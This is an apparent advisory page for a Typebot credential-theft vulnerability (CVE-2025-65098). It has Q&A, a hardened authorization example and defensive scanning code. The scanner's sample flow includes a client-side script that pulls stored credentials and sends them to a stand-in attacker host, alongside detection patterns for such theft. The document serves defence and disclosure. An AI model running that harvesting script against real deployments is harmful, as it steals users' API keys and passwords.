CVE-2025-65098
BaseFortify
Publication date: 2026-01-22
Last updated on: 2026-01-30
Assigner: GitHub, Inc.
Description
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| typebot | typebot | < 3.13.2 (3.13.2 itself is not affected) |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-639 | The system's authorization functionality does not prevent one user from gaining access to another user's data or record by modifying the key value identifying the data. |
| CWE-522 | The product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval. |
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
| CWE-200 | The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. |
| CWE-311 | The product does not encrypt sensitive or critical information before storage or transmission. |
| CWE-862 | The product does not perform an authorization check when an actor attempts to access a resource or perform an action. |
| CWE-284 | The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor. |
AI Powered Q&A
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
This vulnerability allows attackers to steal sensitive credentials such as API keys, tokens, and passwords, which can then be used to reach personal and confidential data held in the connected services. Such a breach could put the operator out of compliance with data protection regulations like GDPR and HIPAA, which require safeguarding sensitive information and enforcing proper access controls. The exposure of credentials and the unauthorized data access that follows may lead to financial loss and reportable data breaches, violating these standards' requirements for confidentiality and data security. [1]
Can you explain this vulnerability to me?
CVE-2025-65098 is a high-severity vulnerability in Typebot versions prior to 3.13.2 that allows an attacker to steal credentials stored in the platform. The chain has two parts. First, Typebot's Script block can be set to 'Execute on client', which runs attacker-supplied JavaScript in the browser of any user who opens a malicious typebot. Second, that JavaScript can call the API endpoint /api/trpc/credentials.getCredentials with the victim's authenticated session, and the endpoint returned stored API keys and other secrets in plaintext without checking that the caller owned them. An attacker who tricks a logged-in user into running a malicious typebot can therefore exfiltrate OpenAI keys, Google Sheets tokens, SMTP passwords, and other integration secrets to a server they control. [1]
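The authorization gap described above, as an added illustration that is not Typebot's own code or its actual fix: a credentials lookup keyed only by the record id (CWE-639 / CWE-862) that hands back the decrypted secret (CWE-522), next to a hardened handler that scopes the lookup to the caller's workspace membership and returns metadata only. The in-memory store, the session shape and all names are assumptions made for the example.

```javascript
// Added example, not Typebot code. Constructed sample data: two workspaces, one
// stored credential each, and one membership per user.
const CREDENTIALS = [
  { id: "cred-1", workspaceId: "ws-alice", type: "openai", name: "prod key", secret: "sk-alice-constructed" },
  { id: "cred-2", workspaceId: "ws-bob", type: "smtp", name: "mailer", secret: "bob-smtp-constructed" },
];
const MEMBERSHIPS = [
  { userId: "alice", workspaceId: "ws-alice" },
  { userId: "bob", workspaceId: "ws-bob" },
];

// Vulnerable shape (assumed for illustration): any authenticated session can fetch
// any record by id, and the response carries the decrypted secret.
function getCredentialsVulnerable(session, credentialsId) {
  if (!session || !session.userId) throw new Error("UNAUTHORIZED");
  const cred = CREDENTIALS.find(c => c.id === credentialsId);
  if (!cred) throw new Error("NOT_FOUND");
  return { ...cred }; // leaks `secret` to whoever supplied the id
}

// Hardened shape: the lookup is filtered on ownership in the same step as the id,
// so a foreign id and a non-existent id are indistinguishable, and the secret never
// leaves the server (integrations use it server-side).
function getCredentialsHardened(session, credentialsId) {
  if (!session || !session.userId) throw new Error("UNAUTHORIZED");
  const allowed = new Set(
    MEMBERSHIPS.filter(m => m.userId === session.userId).map(m => m.workspaceId),
  );
  const cred = CREDENTIALS.find(c => c.id === credentialsId && allowed.has(c.workspaceId));
  if (!cred) throw new Error("NOT_FOUND");
  const { secret, ...meta } = cred; // strip secret material from the response
  return meta;
}

// Returns the outcome of Bob's session asking for Alice's credential under both handlers.
function crossTenantProbe() {
  const bob = { userId: "bob" };
  const leaked = getCredentialsVulnerable(bob, "cred-1");
  let hardenedError = null;
  try {
    getCredentialsHardened(bob, "cred-1");
  } catch (e) {
    hardenedError = e.message;
  }
  return { leakedSecret: leaked.secret, hardenedError };
}
```

Two design points carry over to any real fix: put the ownership predicate in the query itself rather than checking it after the fetch, so there is no code path that loads a foreign record at all, and treat "secret never returned to the browser" as a separate control from "caller is authorized", since the advisory lists both CWE-639 and CWE-522.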
How can this vulnerability impact me?
This vulnerability can lead to significant credential theft, allowing attackers to obtain sensitive API keys and tokens such as OpenAI keys, Google Sheets tokens, and SMTP passwords. This can result in unauthorized use of services (e.g., costly OpenAI API usage), exposure of confidential company data stored in Google Sheets, and compromise of email systems via stolen SMTP credentials. Overall, it can cause financial loss, data breaches, and unauthorized access to critical resources. [1]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
Detection has three angles. On the server, log and alert on requests to /api/trpc/credentials.getCredentials that do not originate from the builder UI, for example an unexpected Referer or Origin, or many calls for different credential ids from a single session. On the network or endpoint, watch for browsers with Typebot pages open that make outbound requests to unfamiliar hosts, which is the exfiltration step. In the application itself, audit typebot definitions for Script blocks with 'Execute on client' enabled and inspect their JavaScript for calls to the credentials endpoint or to external URLs. The referenced resources do not provide specific commands. [1]
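The two application-side checks above, as an added example that is not part of the original page or of Typebot: one function walks an exported typebot definition and flags Script blocks that run on the client and contain credential-harvesting indicators; the other walks web-server access-log lines and flags clients that hit the credentials endpoint from outside the builder origin. The flow layout (groups containing blocks, block type "Script", options.isExecutedOnClient, options.content), the "combined" log format and the sample data are assumptions constructed for the example; adjust the field names to your Typebot version's export.

```javascript
// Added example, not Typebot code. Offline checks for CVE-2025-65098 indicators.
const ENDPOINT = "/api/trpc/credentials.getCredentials";

// Indicators that a client-side script reaches for credentials or ships data out.
const INDICATORS = [
  { name: "calls credentials endpoint", re: /credentials\.getCredentials/ },
  { name: "reads session cookie", re: /document\.cookie/ },
  { name: "sends data to a remote host", re: /\b(fetch|XMLHttpRequest|sendBeacon)\b[\s\S]{0,80}https?:\/\//i },
];

// Walk an exported flow (assumed shape: groups -> blocks) and report every Script
// block that executes on the client, with the indicators its content matches.
function scanFlow(flow) {
  const findings = [];
  for (const group of flow.groups || []) {
    for (const block of group.blocks || []) {
      if (block.type !== "Script") continue;
      const opts = block.options || {};
      if (!opts.isExecutedOnClient) continue; // server-side scripts cannot use the viewer's session
      const content = String(opts.content || "");
      const hits = INDICATORS.filter(i => i.re.test(content)).map(i => i.name);
      findings.push({ group: group.title, block: block.id, indicators: hits, risky: hits.length > 0 });
    }
  }
  return findings;
}

// Apache/Nginx "combined" log line: ip ident user [time] "METHOD path proto" status size "referer" "ua"
const LOG_RE = /^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) \S+ "([^"]*)" "[^"]*"$/;

// Group successful calls to the credentials endpoint by client IP and flag clients
// whose Referer is not the builder origin (heuristic: Referer can be absent or stripped).
function scanAccessLog(lines, builderOrigin) {
  const byClient = new Map();
  for (const line of lines) {
    const m = LOG_RE.exec(line);
    if (!m) continue;
    const [, ip, , path, status, referer] = m;
    if (!path.startsWith(ENDPOINT) || status !== "200") continue;
    const entry = byClient.get(ip) || { ip, hits: 0, fromOutsideBuilder: 0, referers: new Set() };
    entry.hits += 1;
    if (!referer.startsWith(builderOrigin)) entry.fromOutsideBuilder += 1;
    entry.referers.add(referer);
    byClient.set(ip, entry);
  }
  return [...byClient.values()].map(e => ({ ...e, referers: [...e.referers], suspicious: e.fromOutsideBuilder > 0 }));
}

// Constructed sample flow: one server-side script, one client-side harvester, one benign client-side script.
const SAMPLE_FLOW = {
  name: "constructed sample",
  groups: [
    { title: "Welcome", blocks: [
      { id: "b1", type: "text", content: { richText: [] } },
      { id: "b2", type: "Script", options: { isExecutedOnClient: false, content: "console.log('server side')" } },
    ] },
    { title: "Harvest", blocks: [
      { id: "b3", type: "Script", options: { isExecutedOnClient: true,
        content: "fetch('/api/trpc/credentials.getCredentials').then(r=>r.text()).then(t=>fetch('https://attacker.example/c?d='+btoa(t)))" } },
      { id: "b4", type: "Script", options: { isExecutedOnClient: true, content: "document.title = 'Hi'" } },
    ] },
  ],
};

// Constructed sample log lines (RFC 5737 addresses, example hostnames).
const SAMPLE_LOG = [
  '203.0.113.7 - - [22/Jan/2026:10:00:01 +0000] "GET /api/trpc/credentials.getCredentials?batch=1 HTTP/1.1" 200 812 "https://typebot.example/typebots/abc/edit" "Mozilla/5.0"',
  '198.51.100.9 - - [22/Jan/2026:10:02:13 +0000] "GET /api/trpc/credentials.getCredentials?batch=1 HTTP/1.1" 200 812 "https://bot.example/malicious-typebot" "Mozilla/5.0"',
  '198.51.100.9 - - [22/Jan/2026:10:02:14 +0000] "POST /api/v1/sendMessage HTTP/1.1" 200 120 "https://bot.example/malicious-typebot" "Mozilla/5.0"',
  '203.0.113.7 - - [22/Jan/2026:10:03:00 +0000] "GET /api/trpc/credentials.getCredentials?batch=1 HTTP/1.1" 401 0 "https://bot.example/other" "Mozilla/5.0"',
];

function runSampleScan() {
  return { flow: scanFlow(SAMPLE_FLOW), log: scanAccessLog(SAMPLE_LOG, "https://typebot.example") };
}
```

On the sample data the flow scan reports b3 as risky (it calls the credentials endpoint and posts to a remote host) and b4 as a client-side script with no indicators, which still deserves a manual look because any 'Execute on client' block is the delivery vehicle. The log scan flags 198.51.100.9 only; the 401 line is ignored because a failed call leaks nothing. Treat the Referer check as a triage signal rather than proof, since Referrer-Policy can strip it, and pair it with a per-session count of distinct credential ids if your logs carry the tRPC input.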
What immediate steps should I take to mitigate this vulnerability?
The immediate mitigation step is to upgrade Typebot to version 3.13.2 or later, where this vulnerability is fixed. Until the upgrade is done, users should not open or run untrusted typebots while logged in to the builder, and operators should review existing typebots for Script blocks with 'Execute on client' enabled. Because the stolen material is usable independently of Typebot, any API keys and tokens that may have been exposed (OpenAI keys, Google Sheets tokens, SMTP passwords) should be revoked and rotated rather than only reviewed. [1]